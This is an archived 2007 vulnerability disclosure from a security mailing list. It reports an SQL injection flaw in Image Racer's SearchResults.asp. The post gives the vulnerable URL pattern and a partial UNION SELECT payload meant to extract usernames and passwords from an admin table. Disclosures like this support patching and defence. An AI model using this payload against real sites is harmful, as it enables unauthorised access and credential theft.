The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.


<< Previous INDEX Search src / Print Next >> 
Date: 22 Jul 2007 23:42:46 -0000
From: [email protected]
To: [email protected]
Subject: [Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.
X-Virus-Scanned: antivirus-gw at tyumen.ru

__________________

Aria-Security Team
__________________

Image Racer SearchResults.asp SQL Injection
Vendor: http://www.junctionquest.com/Software.asp

Example:
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

Example :
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1

------------------------------------------------
Credits: Aria-Security Team 
http://aria-security.net/
Personal Blog: http://outlaw.aria-security.info

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру